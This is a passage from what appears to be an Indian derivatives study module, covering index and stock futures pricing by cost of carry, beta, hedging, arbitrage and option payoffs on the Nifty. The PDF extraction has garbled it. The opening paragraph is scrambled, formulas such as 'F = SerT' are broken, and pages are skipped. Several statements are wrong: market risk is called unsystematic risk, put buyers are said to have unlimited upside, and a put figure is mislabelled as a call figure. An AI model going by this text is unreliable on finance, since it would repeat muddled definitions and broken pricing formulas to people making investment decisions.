This implies much lower capital adequacy and margin requirements. The most popular index derivative contracts the world over are index futures and index options. ETFs are just what their name implies: baskets of securities that are traded. Unlike regular open-end mutual funds. on an exchange. ETFs can be bought and sold throughout the trading day like any stock. We here restrict our discussion to only index derivatives.2.1 Index derivatives Index derivatives are derivative contracts which have the index as the underlying. and the possibility of cornering is reduced. Pension funds in the US are known to use stock index futures for risk hedging purposes. This is partly because an individual stock has a limited supply. Index-derivatives are more suited to them and more cost-effective than derivatives based on individual stocks. more so in India. index funds2 and the exchange traded funds3 . forged/fake certificates. is much less volatile than individual stock prices. NSE’s market index. which can be cornered. and hence do not suffer from settlement delays and problems related to bad delivery. 2 3 An index fund is a fund that tries to replicate the index returns. Various products have been designed based on the indices such as the index derivatives. • Index derivatives are cash settled. like individual stocks.6 Applications of Index Besides serving as a barometer of the economy/market. It does so by investing in index stocks in the proportions in which these stocks exist in the index. the S&P CNX Nifty was scientifically designed to enable the launch of indexbased products like index derivatives and index funds. 17 . the index also has other applications in finance. Following are the reasons of popularity of index derivatives: • Institutional and large equity-holders need portfolio-hedging facility.6. • Stock index is difficult to manipulate as compared to individual stock prices. • Stock index. 2. • Index derivatives offer ease of use for hedging any portfolio irrespective of its composition. being an average.
While futures and options are now actively traded on many exchanges.CHAPTER 3: Futures Contracts. Mechanism and Pricing In recent years. • • • The contract price is generally not available in public domain. 18 . The other party assumes a short position and agrees to sell the asset on the same date for the same price. We then introduce futures contracts and describe how they are different from forward contracts. The concept of cost of carry for calculation of the forward price has been a very powerful concept. Each contract is custom designed. On the expiration date. 3. If the party wishes to reverse the contract. derivatives have become increasingly important in the field of finance. price and quantity are negotiated bilaterally by the parties to the contract. the contract has to be settled by delivery of the asset. The terminology of futures contracts along with their trading mechanism has been discussed next. which often results in high prices being charged. forward contracts are popular on the OTC market. Other contract details like delivery date. The key idea of this chapter however is the pricing of futures contracts. The forward contracts are normally traded outside the exchanges. The chapter explains mechanism and pricing of both Index futures and futures contracts on individual stocks. One would realize that it essentially works as a parity condition and any violation of this principle can lead to arbitrage opportunities. it has to compulsorily go to the same counter-party. We shall first discuss about forward contracts along with their advantages and limitations. expiration date and the asset type and quality.1 Forward Contracts A forward contract is an agreement to buy or sell an asset on a specified date for a specified price. The salient features of forward contracts are as given below: • • They are bilateral contracts and hence exposed to counter-party risk. One of the parties to the contract assumes a long position and agrees to buy the underlying asset on a certain specified future date for a certain specified price. and hence is unique in terms of contract size.
though it avoids the problem of illiquidity. The confusion is primarily because both serve essentially the same economic functions of allocating risk in the presence of future price uncertainty. but makes the contracts non-tradable.2 Limitations of forward markets Forward markets world-wide are posed by several problems: • • • Lack of centralization of trading.. the basic problem is that of too much flexibility and generality.1 lists the distinction between the forwards and futures contracts.3. in which any two consenting adults can form contracts against each other. the other suffers. Table 3. still the counterparty risk remains a very serious issue. (or which can be used for reference purposes in settlement) and a standard timing of such settlement. the futures contracts are standardized and exchange traded. 19 . This often makes them design the terms of the deal which are convenient in that specific situation. A futures contract may be offset prior to maturity by entering into an equal and opposite transaction. When forward markets trade standardized contracts. However futures are a significant improvement over the forward contracts as they eliminate counterparty risk and offer more liquidity. 3. To facilitate liquidity in the futures contracts. But unlike forward contracts. a standard quantity and quality of the underlying instrument that can be delivered. It is a standardized contract with standard underlying instrument. Counterparty risk arises from the possibility of default by any one party to the transaction. Illiquidity and Counterparty risk In the first two of these.3 Introduction to Futures A futures contract is an agreement between two parties to buy or sell an asset at a certain time in the future at a certain price. The forward market is like a real estate market. When one of the two sides to the transaction declares bankruptcy.4 Distinction between Futures and Forwards Contracts Forward contracts are often confused with futures contracts.
There will be a different basis for each delivery month for each contract. • Marking-to-market: In the futures market. • Cost of carry: Measures the storage cost plus the interest that is paid to finance the asset less the income earned on the asset. On the Friday following the last Thursday. • Basis: Basis is defined as the futures price minus the spot price.Table 3. This is called marking-to-market. Contract size: The amount of asset that has to be delivered under one contract. Thus a January expiration contract expires on the last Thursday of January and a February expiration contract ceases trading on the last Thursday of February. a new contract having a three-month expiry is introduced for trading. This reflects that futures prices normally exceed spot prices. the margin account is adjusted to reflect the investor’s gain or loss depending upon the futures closing price. In a normal market. • Contract cycle: It is the period over which a contract trades. Futures price: The price that is agreed upon at the time of the contract for the delivery of an asset at a specific future date. This is also called as the lot size. basis will be positive. The index futures contracts on the NSE have one-month. • Initial margin: The amount that must be deposited in the margin account at the time a futures contract is first entered into is known as initial margin. • Expiry date: is the date on which the final settlement of the contract takes place. at the end of each trading day. 20 .5 • • Futures Terminology Spot price: The price at which an underlying asset trades in the spot market.
One of the reasons for the success has been the ease of trading and settling these contracts. 3. Trading Single Stock Futures The single stock futures market in India has been a great success story. Buying futures simply involves putting in the margin money.6 Trading Underlying vs.7. They enable the futures traders to take a position in the underlying security without having to open an account with a securities broker. These linear payoffs are fascinating as they can be combined with options and the underlying to generate various complex payoffs. Selling securities involves buying the security before selling it. 21 . one must open a futures trading account with a derivatives broker. With the purchase of shares of a company. invitation to the annual shareholders meeting and the power to vote. which may include the receipt of dividends. the holder becomes a part owner of the company. It implies that the losses as well as profits for the buyer and the seller of a futures contract are unlimited. To trade securities. Security futures do not represent ownership in a corporation and the holder is therefore not regarded as a shareholder. and when the index moves down it starts making losses. With the purchase of futures on a security. the holder essentially makes a legally binding promise or obligation to buy the underlying security at some point in the future (the expiration date of the contract). Buying security involves putting up all the money upfront. the long futures position starts making profits. The shareholder typically receives the rights and privileges associated with the security. He has a potentially unlimited upside as well as a potentially unlimited downside. Take the case of a speculator who buys a two-month Nifty index futures contract when the Nifty stands at 2220.1 Payoff for buyer of futures: Long futures The payoff for a person who buys a futures contract is similar to the payoff for a person who holds an asset. one must open a security trading account with a securities broker and a demat account with a securities depository. If the balance in the margin account falls below the maintenance margin. To trade in futures. Even in cases where short selling is permitted. the investor receives a margin call and is expected to top up the margin account to the initial margin level before trading commences on the next day. 3. it is assumed that the securities broker owns the security and then “lends” it to the trader so that he can sell it.7 Futures Payoffs Futures contracts have linear or symmetrical payoffs. When the index moves up. 3. The underlying asset in this case is the Nifty portfolio.• Maintenance margin: Investors are required to place margins with their trading members before they are allowed to trade.
22 .7. If the index rises. 3.2 shows the profits/losses for a short futures position. and when the index moves up.Figure 3. his futures position starts showing losses.2 Payoff for seller of futures: Short futures The payoff for a person who sells a futures contract is similar to the payoff for a person who shorts an asset. The underlying asset in this case is the Nifty portfolio.1: Payoff for a buyer of Nifty futures The figure 3. The investor sold futures when the index was at 2220. Figure 3.2: Payoff for a seller of Nifty futures The figure 3. it starts making losses.1 above shows the profits/losses for a long futures position. When the index moves down. He has a potentially unlimited upside as well as a potentially unlimited downside. his futures position starts making profit. his futures position starts making profit. the short futures position starts making profits. If the index goes down. The investor bought futures when the index was at 2220. his futures position starts showing losses. Take the case of a speculator who sells a two-month Nifty index futures contract when the Nifty stands at 2220. If the index falls. If the index goes up.
3. the better is the estimate of the futures price. 23 .71828 Example: Security XYZ Ltd trades in the spot market at Rs. a crucial aspect of dealing with equity futures as opposed to commodity futures is an accurate forecasting of dividends.Dividends.8 Pricing Futures Pricing of futures contract is very simple. Cost of carry = Financing cost . Therefore. In their short history of trading. which is a negative cost if you are long the stock and a positive cost if you are short the stock. Stock index futures are cash settled. The better the forecast of dividend offered by a security. Thus. The cost of carry model used for pricing futures is given below: F = SerT where: r T e Cost of financing (using continuously compounded interest rate) Time till expiration in years 2. there is no delivery of the underlying stocks. This in turn would push the futures price back to its fair value.a. Equity comes with a dividend stream. arbitragers would enter into trades to capture the arbitrage profit.1 Pricing equity index futures A futures contract on the stock market index gives its owner the right and obligation to buy or sell the portfolio of stocks characterized by the index. Money can be invested at 11% p. The main differences between commodity and equity index futures are that: • • There are no costs of storage involved in holding equity. Every time the observed price deviates from the fair value.8. Its existence has revolutionized the art and science of institutional equity portfolio management. we calculate the fair value of a futures contract. Using the cost-of-carry logic. The fair value of a one-month futures contract on XYZ is calculated as follows: 3. 1150. index futures have had a great impact on the world’s securities markets.
2. two and three-month contracts. we need to reduce the cost-of-carry to the extent of dividend received.e. the futures price is calculated as.8.07). 6. If the market price of ABC Ltd. Current value of Nifty is 4000 and Nifty trades with a multiplier of 100.28. if there are few historical cases of clustering of dividends in any particular month. 7. (200*20). To calculate the futures price we need to compute the amount of dividend received per unit of Nifty. If ABC Ltd. 3. Nifty futures trade on NSE as one.140. F = Se(r-q)T where: F futures price S spot index value r cost of financing 24 . 4.20 per share after 15 days of purchasing the contract. where the carrying cost is the cost of financing the purchase of the portfolio underlying the index. (28.3 Pricing index futures given expected dividend yield If the dividend flow throughout the year is generally uniform. i.8. will be declaring a dividend of Rs. The dividend is received 15 days later and hence compounded only for the remainder of 45 days.e.(400. 3. is Rs.3. Thus. Since Nifty is traded in multiples of 100. Hence we divide the compounded dividend figure by 100. What will be the price of a new two-month futures contract on Nifty? 1.e.000 i. Let us assume that ABC Ltd. The amount of dividend received is Rs.000/140).000. it is useful to calculate the annual dividend yield. 5.2 Pricing index futures given expected dividend amount The pricing of index futures is based on the cost-of-carry model.e. its value in Nifty is Rs.000 * 0. then a traded unit of Nifty involves 200 shares of ABC Ltd.4000 i. i.400. To calculate the futures price. Has a weight of 7% in Nifty. This has been illustrated in the example below. value of the contract is 100*4000 = Rs. minus the present value of dividends obtained from the stocks in the index portfolio. Money can be borrowed at a rate of 10% per annum.
What is the fair value of the futures contract ? Fair value = 4000e (0. the basis reduces . At a later stage we shall look at how these arbitrage opportunities can be exploited.3 above shows how basis changes over time.1-0. Towards the close of trading on the day of settlement. The spot value of Nifty 4000. 25 . Arbitrage opportunities can also arise when the basis (difference between spot and futures price) or the spreads (difference between prices of two futures contracts) during the life of a contract are incorrect. the futures price and the spot price converge.02) × (60 / 365) = Rs. Nuances: • As the date of expiration comes near. The cost of financing is 10% and the dividend yield on Nifty is 2% annualized. then there is an arbitrage opportunity. As we know. the basis reduces. As the time to expiration of a contract reduces. The closing price for the June 28 futures contract is the closing value of Nifty on that day.95 The cost-of-carry model explicitly defines the relationship between the futures price and the related spot price. On the date of expiration. the difference between the spot price and the futures price is called the basis.3: Variation of basis over time The figure 3. 4052.q expected dividend yield T holding period Example A two-month futures contract trades on the NSE. If it is not.there is a convergence of the futures price towards the spot price. the basis is zero. Figure 3.
9. minus the present value of dividends obtained from the stock. Cost of carry = Financing cost . 231.1 Pricing stock futures when no dividend expected The pricing of stock futures is also based on the cost-of-carry model.3. there is no delivery of the underlying stocks. It has been illustrated in the example given below: XYZ Ltd.’s futures trade on NSE as one. the main differences between commodity and stock futures are that: • • There are no costs of storage involved in holding stock. 3. The net carrying cost is the cost of financing the purchase of the stock.9.90 3.2 Pricing stock futures when dividends are expected When dividends are expected during the life of the futures contract. Thus. Stocks come with a dividend stream.1*(60/365) 26 . is Rs.9 Pricing Stock Futures A futures contract on a stock gives its owner the right and obligation to buy or sell the stocks. What will be the price of a unit of new two-month futures contract on XYZ Ltd. if no dividends are expected during the two-month period? 1. futures price F = 228e = Rs. The better the forecast of dividend offered by a security. two and three-month contracts. 228. Just as in the case of index futures. Therefore. This is explained in the illustration below: XYZ Ltd. Thus. stock futures are also cash settled. a crucial aspect of dealing with stock futures as opposed to commodity futures is an accurate forecasting of dividends. the better is the estimate of the futures price. Like index futures. pricing involves reducing the cost of carry to the extent of the dividends. What will be the price of a unit of new two-month futures contract on XYZ Ltd. which is a negative cost if you are long the stock and a positive cost if you are short the stock. minus the present value of dividends obtained from the stock. Money can be borrowed at 10% per annum. two and three-month contracts. Assume that the spot price of XYZ Ltd. where the carrying cost is the cost of financing the purchase of the stock.Dividends. If no dividends are expected during the life of the contract. futures trade on NSE as one. pricing futures on that stock involves multiplying the spot price by the cost of carry. if dividends are expected during the two-month period? 0.
4. The dividend is received 15 days later and hence compounded only for the remainder of 45 days. 10 per share after 15 days of purchasing the contract. Assume that the market price of XYZ Ltd. 2.132. futures price F = 140e 0.1× (60/365) – 10e 0.10. is Rs. The amount of dividend received is Rs. will be declaring a dividend of Rs. To calculate the futures price. Let us assume that XYZ Ltd. 140. 3. we need to reduce the cost-of-carry to the extent of dividend received.20 27 .1× (45/365) = Rs. Thus.1.
say Nifty 50. Beta of a portfolio. calculating portfolio beta is simple.390. 450 to Rs. Beta measures how much a stock would rise or fall if the market rises / falls. the value of a portfolio with a beta of two will move up by 20 percent. A stock with a beta of 1. Thereafter hedging strategies using individual stock futures has been discussed in detail through numerical illustrations and payoff profiles. he would either suffer the discomfort of a price fall or sell the security in anticipation of a market upheaval. the stock will move by 1. In practice given individual stock betas.390. Similarly.5%) in the opposite direction as the index. The index has a beta of one.5 percent movement in the value of the portfolio. If the index moves up by 10 percent.1 Understanding Beta (β) β Beta measures the sensitivity of stocks responsiveness to market factors. Generally. Assume that the spot price of the security which he holds is Rs. Long security. take on a short futures position. a 10 percent movement in the index will cause a 7.5% when the Nifty 50 rises / falls by 1%. he will suffer losses on the security he holds. Similarly. Two-month futures cost him Rs. In the absence of stock futures.5% (β = 1. If the index drops by 10 percent.1. measures the portfolios responsiveness to market movements. the stock will move by 1. Similarly if the index drops by 5 percent. A portfolio with a beta of two. 4. Which means for every 1% movement in the Nifty. an investor who holds the shares of a company sees the value of his security falling from Rs.5% will rise / fall by 1. the portfolio value will increase by 10 percent. For this he pays an initial margin.2.2 Numerical illustration of Applications of Stock Futures 4. sell futures Futures can be used as a risk-management tool. 4. the portfolio value will drop by 5 percent. it is seen that when markets rise. if a portfolio has a beta of 0. All he needs to do is enter into an offsetting stock futures position.402.5% will rise / fall by 1. Now if the price of the security falls any further. Take 28 . For example. Which means for every 1% movement in the Nifty. However. in this case. the losses he suffers on the security will be offset by the profits he makes on his short futures position. It is nothing but the weighted average of the stock betas.5% when the Nifty 50 falls / rises by 1%.CHAPTER 4: Application of Futures Contracts This chapter begins with a brief introduction of the concept of Beta (β) which indicates the sensitivity of an individual stock or portfolio’s return to the returns on the market index.5%) in the same direction as the index. The market is indicated by the index.1. most stock prices rise and vice versa. With security futures he can minimize his price risk.75.5% (β = 1. responds more sharply to index movements. If the index moves up by 10 percent. the value of a portfolio with a beta of two will fall by 20 percent. A stock with a beta of .
000 for a period of two months. He pays a small margin on the same. assume that the minimum contract value is 100. security futures form an attractive option for speculators. Assume that he buys 100 shares which cost him one lakh rupees.20 per share. He buys 100 security futures for which he pays a margin of Rs. This works out to an annual return of 12 percent. will be made up by the profits made on his short futures position.000. Let us see how this works.2 Speculation: Bullish security.000. 20. Today a speculator can take exactly the same position on the security by using futures contracts. For the one contract that he bought. If the security price falls. 400 on an investment of Rs. He has made a clean profit of Rs. 4. Today all he needs to do is sell stock futures. He would like to trade based on this view. 100. there wasn’t much he could do to profit from his opinion. as long as there is sufficient liquidity in the market for the security. so will the futures price. The fall in the price of the security will result in a fall in the price of futures. How can he trade based on his opinion? In the absence of a deferral product. The loss of Rs. 29 . Two months later the security closes at 1010. sell futures Stock futures can be used by a speculator who believes that a particular security is overvalued and is likely to see a fall in price. 4.3 Speculation: Bearish security. He believes that a particular security that trades at Rs. How can he trade based on this belief? In the absence of a deferral product. His hunch proves correct and two months later the security closes at Rs.000. so will the futures price. ABC closes at 220. the spot and the futures price converges. buy futures Take the case of a speculator who has a view on the direction of the market. On the day of expiration. Hence his short futures position will start making profits.for instance that the price of his security falls to Rs. when the futures contract expires. Let us understand how this works. this works out to be Rs.240 (each contact for 100 underlying shares). the futures price converges to the spot price and he makes a profit of Rs. he would have to buy the security and hold on to it.1000 is undervalued and expect its price to go up in the next two-three months.2.350.1010. 2000. Two months later. He sells one two-month contract of futures on ABC at Rs.1000 on an investment of Rs. 20. He makes a profit of Rs. Futures will now trade at a price lower than the price at which he entered into a short futures position. If the security price rises.2. On the day of expiration. The security trades at Rs.40 incurred on the security he holds. Now take the case of the trader who expects to see a fall in the price of ABC Ltd. This works out to an annual return of 6 percent. Just for the sake of comparison.1000 and the two-month futures trades at 1006. Simple arbitrage ensures that futures on an individual securities move correspondingly with the underlying security. Because of the leverage they provide.
If the cost of borrowing funds to buy the security is less than the arbitrage profit possible. arbitrage opportunities arise. Now unwind the position. trades at Rs. 4. borrow funds. 8. Simultaneously.2. The result is a riskless profit of Rs. If you notice that futures on a security that you have been observing seem overpriced. Return the borrowed funds.4 Arbitrage: Overpriced futures: buy spot. 3.10 on the futures position.975.2. Now unwind the position. the spot and the futures price converge. Take delivery of the security purchased and hold the security for a month. As an arbitrageur. The result is a riskless profit of Rs. sell spot Whenever the futures price deviates substantially from its fair value.1015. arbitrage opportunities arise. 6.10. One-month ABC futures trade at Rs. Whenever the futures price deviates substantially from its fair value. the spot and the futures price converge. On the futures expiration date.5 Arbitrage: Underpriced futures: buy futures. 10. 1. 965 and seem underpriced. it makes sense for you to arbitrage. Futures position expires with profit of Rs. 7. On day one. Buy back the security.15 on the spot position and Rs. 1. How can you cash in on this opportunity to earn riskless profits? Say for instance. you can make riskless profit by entering into the following set of transactions. Sell the security. 2. ABC Ltd. The futures position expires with a profit of Rs. trades at Rs. ABC Ltd.1000. In the real world.10 on the futures position.25 on the spot position and Rs. It could be the case that you notice the futures on a security you hold seem underpriced. 30 . sell the security in the cash/spot market at 1000. 2. the cost-of-carry ensures that the futures price stay in tune with the spot price. On day one. Say the security closes at Rs. Make delivery of the security. buy the futures on the security at 965.4. buy the security on the cash/spot market at 1000. 4.1025 and seem overpriced. 4. Say the security closes at Rs. 7. sell futures As we discussed earlier. 5. Simultaneously. one has to build in the transactions costs into the arbitrage strategy. 6. One-month ABC futures trade at Rs. you can make riskless profit by entering into the following set of transactions. sell the futures on the security at 1025.1000. how can you cash in on this opportunity to earn riskless profits? Say for instance. 3. As an arbitrageur. On the futures expiration date.
3. which is called as the Systematic Risk or Market Risk or Non-diversifiable Risk. Generally. stock portfolio prices are affected. The investor can buy more stocks of different industries to diversify his portfolio so that the price change of any one stock does not affect his portfolio. it makes sense for you to arbitrage. This risk can be reduced through appropriate diversification. A fall in the index (say Nifty 50) in a day sees most of the stock prices fall. Suppose. He uses Nifty March Futures to hedge. The market is denoted by the index. This is termed as reverse-cash-andcarry arbitrage.00.If the returns you get by investing in riskless instruments is more than the return from the arbitrage trades. exploiting arbitrage involves trading on the spot market. However. Therefore. Hedging using Stock Index Futures or Single Stock Futures is one way to reduce the Unsystematic Risk. Unsystematic risk is also called as Company Specific Risk or Diversifiable Risk. 4. 290 per share (approximate portfolio value of Rs. It is this arbitrage activity that ensures that the spot and futures prices stay in line with the cost-of-carry. 9. This is due to the inherent Market Risk or Unsystematic Risk in the portfolio. Diversification reduces unsystematic risk. Any change in the government policy would affect the price of steel and the companies share price. a falling overall market would see most stocks falling (and vice versa). Hedging can be done in two ways by an investor who has an exposure to the underlying stock(s): 4. As more and more players in the market develop the knowledge and skills to do cashand-carry and reverse cash-and-carry.1 By Selling Index Futures On March 12 2010. This is considered as Unsystematic Risk. an investor buys 3100 shares of Hindustan Lever Limited (HLL) @ Rs. an investor holds shares of steel company and has no other investments. even if the investor has a diversified portfolio of stocks.000). It is that risk which cannot be reduced through diversification. But there is a risk associated with the overall market returns. the portfolio value is likely to fall of the market falls. Given the overall market movement (falling or rising). However. 31 . diversification does not reduce risk in the overall portfolio completely. we will see increased volumes and lower spreads in both the cash as well as the derivatives market. As we can see.3 Hedging Using Stock Index Futures Broadly there are two types of risks (as shown in the figure below) and hedging is used to minimize these risks. This is the market specific risk. the investor fears that the market will fall and thus needs to hedge.
Once it is purchased. which is free to enter into. Same as futures. More generally. To buy a put option on Nifty is to buy insurance which reimburses the full extent to which Nifty drops below the strike price of the put option. Price is always positive. Table 5. Buying put options is buying insurance. He pays for the option in full at the time it is purchased. and sells it at a future date at an unknown price. This is different from futures. Profits are limited to the option premium. 5. Table 5. We look here at the six basic payoffs. There is no possibility of the options position generating any further losses to him (other than the funds already paid for the option). After this. For a writer. with novation Exchange defines the product Price is zero. Only short at risk. who cannot put in the time to closely monitor their futures positions. Nifty for instance. St. By combining futures and options. price moves.2 Comparison between Futures and Options Options are different from futures in several interesting senses.3.1 presents the comparison between the futures and options. This characteristic makes options attractive to many occasional market participants. the investor is said to be “long” the asset. This is attractive to many people.5. 35 .1: Comparison between Futures and Options Futures Exchange traded.1 shows the payoff for a long position on the Nifty. however the profits are potentially unlimited. Figure 5.1 Payoff profile of buyer of asset: Long asset In this basic position. a wide variety of innovative and useful payoff structures can be created. These non-linear payoffs are fascinating as they lend themselves to be used to generate various payoffs by using combinations of options and the underlying. 5. Nonlinear payoff. Strike price is fixed.3 Options Payoffs The optionality characteristic of options results in a non-linear payoff for options. but can generate very large losses. an investor buys the underlying asset. the option buyer faces an interesting situation. strike price moves Price is zero Linear payoff Both long and short at risk Options Same as futures. he only has an upside. the payoff is exactly the opposite. for 2220. options offer “nonlinear payoffs” whereas futures only have “linear payoffs”. It means that the losses for the buyer of an option are limited. and losses are potentially unlimited. At a practical level. and to mutual funds creating “guaranteed return products”.
If the index falls. else losses 5. Higher the spot price. the option expires un-exercised. The investor sold the index at 2220. the investor is said to be “short” the asset. If the spot price of the underlying is less than the strike price.2 shows the payoff for a short position on the Nifty. he makes a profit. Once it is sold.2: Payoff for investor who went Short Nifty at 2220 The figure 5. Nifty for instance.3. The investor bought the index at 2220. more is the profit.3 Payoff profile for buyer of call options: Long call A call option gives the buyer the right to buy the underlying asset at the strike price specified in the option. The profit/loss that the buyer makes on the option depends on the spot price of the underlying.3.2 Payoff profile for seller of asset: Short asset In this basic position. If upon expiration.2 shows the profits/losses from a short position on the index.Figure 5. Figure 5. for 2220.1: Payoff for investor who went Long Nifty at 2220 The figure 5. the spot price exceeds the strike price. Figure 5. If the index goes up there is a profit else losses. The loss in this case is the premium paid for 36 . and buys it back at a future date at an unknown price.1 shows the profits/losses from a long position on the index. St. there are profits. 5. an investor shorts the underlying asset.
If upon expiration the spot price of the underlying is less than the strike price.60.3.4 gives the payoff for the writer of a three month call option (often referred to as short call) with a strike of 2250 sold at a premium of 86. the buyer would exercise his option and profit to the extent of the difference between the Nifty-close and the strike price. Whatever is the buyer’s profit is the seller’s loss. Figure 5. 37 . Nifty closes above the strike of 2250. However if Nifty falls below the strike of 2250. Higher the spot price. The losses are limited to the extent of the premium paid for buying the option. as the spot Nifty rises. Figure 5.buying the option. he lets the option expire. For selling the option. The profit/loss that the buyer makes on the option depends on the spot price of the underlying.60.3: Payoff for buyer of call option The figure 5. If upon expiration. As can be seen. the buyer will exercise the option on the writer.4 Payoff profile for writer of call options: Short call A call option gives the buyer the right to buy the underlying asset at the strike price specified in the option. Figure 5. the writer of the option charges a premium. If upon expiration. more are the losses. Hence as the spot price increases the writer of the option starts making losses.3 gives the payoff for the buyer of a three month call option (often referred to as long call) with a strike of 2250 bought at a premium of 86. the spot price exceeds the strike price. 5. The profits possible on this option are potentially unlimited.. the call option is in-the-money.3 above shows the profits/losses for the buyer of a three-month Nifty 2250 call option. the buyer lets his option expire unexercised and the writer gets to keep the premium.
86. If the spot price of the underlying is higher than the strike price.5 gives the payoff for the buyer of a three month put option (often referred to as long put) with a strike of 2250 bought at a premium of 61.Figure 5. Figure 5. 5.5: Payoff for buyer of put option 38 . Lower the spot price more is the profit. His loss in this case is the premium he paid for buying the option. whereas the maximum profit is limited to the extent of the up-front option premium of Rs. the call option is in-the-money and the writer starts making losses.3. If upon expiration. As the spot Nifty rises. the buyer would exercise his option on the writer who would suffer a loss to the extent of the difference between the Nifty-close and the strike price.60 charged by him. The loss that can be incurred by the writer of the option is potentially unlimited. there is a profit.5 Payoff profile for buyer of put options: Long put A put option gives the buyer the right to sell the underlying asset at the strike price specified in the option. the option expires un-exercised. The profit/loss that the buyer makes on the option depends on the spot price of the underlying. Figure 5.70. If upon expiration. the spot price is below the strike price.4 shows the profits/losses for the seller of a three-month Nifty 2250 call option.4: Payoff for writer of call option The figure 5. Nifty closes above the strike of 2250.
Whatever is the buyer’s profit is the seller’s loss. Nifty closes below the strike of 2250. the spot price happens to be below the strike price. The profit/loss that the buyer makes on the option depends on the spot price of the underlying.6 Payoff profile for writer of put options: Short put A put option gives the buyer the right to sell the underlying asset at the strike price specified in the option.The figure 5. the writer of the option charges a premium.5 shows the profits/losses for the buyer of a three-month Nifty 2250 put option. the buyer would exercise his option and profit to the extent of the difference between the strike price and Nifty-close.. Nifty closes below the strike of 2250. For selling the option. the buyer would exercise his option on the writer who would suffer a loss to the extent of the difference between the strike price and Nifty-close. However if Nifty rises above the strike of 2250.3.6: Payoff for writer of put option The figure 5.6 gives the payoff for the writer of a three month put option (often referred to as short put) with a strike of 2250 sold at a premium of 61. the put option is in-the-money. The profits possible on this option can be as high as the strike price. Figure 5.61. If upon expiration. the buyer will exercise the option on the writer.70. Figure 5. the buyer lets his option go un-exercised and the writer gets to keep the premium. If upon expiration.6 shows the profits/losses for the seller of a three-month Nifty 2250 put option.70 charged by him. If upon expiration the spot price of the underlying is more than the strike price. the option expires worthless. As can be seen. the put option is in-the-money and the writer starts making losses. If upon expiration. 5. 39 . As the spot Nifty falls. The losses are limited to the extent of the premium paid for buying the option. as the spot Nifty falls.
Index and stock options are a cheap and can be easily implemented to seek insurance from the market ups and downs. As an owner of stocks or an equity portfolio. When the stock price falls your stock will lose value and the put options bought by you will gain. However since the index is nothing but a security whose price or level is a weighted average of securities constituting the index. buy put options on that stock. 5. effectively ensuring that the total value of your stock plus put does not fall below a particular level. Similarly when the index falls. One way to protect your portfolio from potential downside due to a market drop is to buy insurance using put options. How does one implement a trading strategy to benefit from an upward movement in the underlying security? Using options there are two ways one can do this: 1. This level depends on the strike price of the index options chosen by you. His upside however is potentially unlimited. Many investors simply do not want the fluctuations of these three weeks.4 Application of Options We look here at some applications of options contracts. or Sell put options We have already seen the payoff of a call option. At other times one may witness massive volatility. If you are only concerned about the value of a particular stock that you hold. 2. Suppose you have a hunch that the price of a particular security is going to 40 . To protect the value of your portfolio from falling below a particular level. This level depends on the strike price of the stock options chosen by you. Buy call options.4.1 Hedging: Have underlying buy puts Owners of stocks or equity portfolios often experience discomfort about the overall stock market movement.2 Speculation: Bullish security. your portfolio will lose value and the put options bought by you will gain. Portfolio insurance using put options is of particular interest to mutual funds who already own well-diversified portfolios. effectively ensuring that the value of your portfolio does not fall below a particular level.5. The idea is simple. sometimes one may have a view that stock prices will fall in the near future. By buying puts. buy put options on the index. buy the right number of put options with the right strike price. The union budget is a common and reliable source of such volatility: market volatility is always enhanced for one week before and two weeks after a budget. We refer to single stock options here.4. the fund can limit its downside in case of a market fall. buy calls or sell puts There are times when investors believe that security prices are going to rise. The downside to the buyer of the call option is limited to the option premium he pays for buying the option. 5. all strategies that can be implemented using stock futures can also be implemented using index options. If you are concerned about the overall portfolio.
you make a neat profit of Rs. However the chances of an atthe-money put expiring in-the-money are higher as well. Its execution depends on the unlikely event that the stock will rise by more than 50 points on the expiration date. There are five one-month calls and five one-month puts trading in the market. In the more likely event of the call expiring out-of-the-money. 4. If for instance the security price rises to 1300 and you’ve bought a put with an exercise of 1250. each with a different strike price. A one month call with a strike of 1200. the writer earns the premium amount of Rs. which one should you buy? Given that there are a number of onemonth puts trading. If however your hunch about a downward movement in the market proves to be wrong and the price actually rises.25. A one month call with a strike of 1300. you simply let the put expire. The call with a strike of 1200 is deep in-the-money and hence trades at a higher 44 . A one month call with a strike of 1225. you can also buy puts.2: One month calls and puts trading at different strikes The spot price is 1250. A one month call with a strike of 1275.50. the obvious question is: which strike should you choose? Let us take a look at call options with different strike prices. Which of this options you write largely depends on how strongly you feel about the likelihood of the downward movement of prices and how much you are willing to lose should this downward movement not come about. 5. If the price does fall. There are five one-month calls and five one-month puts trading in the market. risk-free rate is 12% per year and stock volatility is 30%. You could write the following options: 1. The call with a strike of 1300 is deep-out-of-money. As a person who wants to speculate on the hunch that the market may fall.27. As the buyer of puts you face an unlimited upside but a limited downside. the obvious question is: which strike should you choose? This largely depends on how strongly you feel about the likelihood of the downward movement in the market.month calls trading. you profit to the extent the price falls below the strike of the put purchased by you. all you lose is the option premium. each with a different strike price. The call with a strike of 1275 is out-of-the-money and trades at a low premium. There is a small probability that it may be in-the-money by expiration in which case the buyer exercises and the writer suffers losses to the extent that the price is above 1300. Hence writing this call is a fairly safe bet. If however the price does fall to say 1225 on expiration date. 2. 3. A one month call with a strike of 1250. If you buy an at-the-money put. the option premium paid by you will by higher than if you buy an out-of-the-money put. Illustration 5. The call with a strike of 1200 is deep in-the-money and hence trades at a higher premium. Assume that the current stock price is 1250. Having decided to buy a put.
The put with a strike of 1200 is deep out-of-the-money and will only be exercised in the unlikely event that the price falls by 50 points on the expiration date.) 18.) 80.80 64.9 shows the payoffs from buying puts at different strikes. 27. the writer earns the premium amount of Rs.50.50 Put Premium(Rs.50.80 Figure 5.00 49.80.premium.45 37. Hence writing this call is a fairly safe bet. The in-themoney option has the highest premium of Rs. The call with a strike of 1275 is out-of-the-money and trades at a low premium.65 49. 45 .27. the put with a strike of 1300 is deep in-the-money and trades at a higher premium than the at-the-money put at a strike of 1250.15 26. The choice of which put to buy depends upon how much the speculator expects the market to fall. Similarly.50 37.9 shows the payoffs from writing calls at different strikes. There is a small probability that it may be in-the-money by expiration in which case the buyer exercises and the writer suffers losses to the extent that the price is above 1300.50 27.10 63. Price 1250 1250 1250 1250 1250 Strike price of option 1200 1225 1250 1275 1300 Call Premium(Rs.9: Payoff for seller of call option at various strikes The figure 5. The call with a strike of 1300 is deep-out-of-money.10 whereas the out-of-the-money option has the lowest premium of Rs. In the more likely event of the call expiring out-of-the-money. Its execution depends on the unlikely event that the price will rise by more than 50 points on the expiration date.9 shows the profits/losses for a seller of calls at various strike prices. Figure 5. Figure 5.
